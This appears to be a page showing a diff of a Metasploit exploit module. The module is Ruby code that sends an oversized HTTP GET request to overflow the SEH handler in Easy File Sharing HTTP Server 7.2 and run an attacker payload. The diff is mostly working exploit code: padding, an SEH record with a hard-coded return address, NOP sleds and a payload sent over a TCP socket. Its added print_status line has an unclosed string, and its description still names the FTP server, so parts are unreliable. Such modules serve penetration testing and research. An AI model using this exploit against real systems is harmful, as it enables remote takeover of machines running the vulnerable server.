55
66require 'msf/core'
77
8- class Metasploit3 < Msf ::Exploit ::Remote
8+ class MetasploitModule < Msf ::Exploit ::Remote
99
10- Rank = AverageRanking
10+ Rank = NormalRanking
1111
1212 include Msf ::Exploit ::Remote ::Tcp
1313 include Msf ::Exploit ::Seh
1414
1515 def initialize ( info = { } )
1616 super ( update_info ( info ,
17- 'Name' => 'Easy File Sharing FTP Server 7.2 SEH Overflow' ,
17+ 'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow' ,
1818 'Description' => %q{
1919 This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.
2020 } ,
2121 'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>' ,
2222 'License' => MSF_LICENSE ,
2323 'References' =>
2424 [
25- [ 'URL ' , 'https://www.exploit-db.com/exploits/ 39008/ ' ] ,
25+ [ 'EDB ' , '39008' ] ,
2626 ] ,
2727 'Privileged' => true ,
2828 'DefaultOptions' =>
@@ -38,23 +38,28 @@ def initialize(info = {})
3838 'Platform' => 'win' ,
3939 'Targets' =>
4040 [
41- [ 'Windows Universal' , { 'Ret' => 0x10019798 } ] ,
41+ [ 'Easy File Sharing 7.2 HTTP' , { 'Ret' => 0x10019798 } ] ,
4242 ] ,
43- 'DisclosureDate' => 'December 2, 2015' ,
43+ 'DefaultOptions' => {
44+ 'RPORT' => 80
45+ } ,
46+ 'DisclosureDate' => 'Dec 2 2015' ,
4447 'DefaultTarget' => 0 ) )
4548 end
4649
50+ def print_status ( msg = '' )
51+ super ( "#{ peer } #{ msg } )
52+ end
53+
4754 def exploit
4855 connect
49- print_status ( "Generating Shell Code " )
56+ print_status ( "Sending exploit... " )
5057 sploit = "GET "
5158 sploit << rand_text_alpha_upper ( 4061 )
52- print_status ( "Generating Short jump" )
5359 sploit << generate_seh_record ( target . ret )
5460 sploit << make_nops ( 19 )
5561 sploit << payload . encoded
5662 sploit << make_nops ( 7 )
57- print_status ( "Buffer length is: #{ 4500 - 4061 - 4 - 4 - 20 - payload . encoded . length - 20 } )
5863 sploit << rand_text_alpha_upper ( 4500 - 4061 - 4 - 4 - 20 - payload . encoded . length - 20 )
5964 sploit << " HTTP/1.0\r \n \r \n "
6065 sock . put ( sploit )
0 commit comments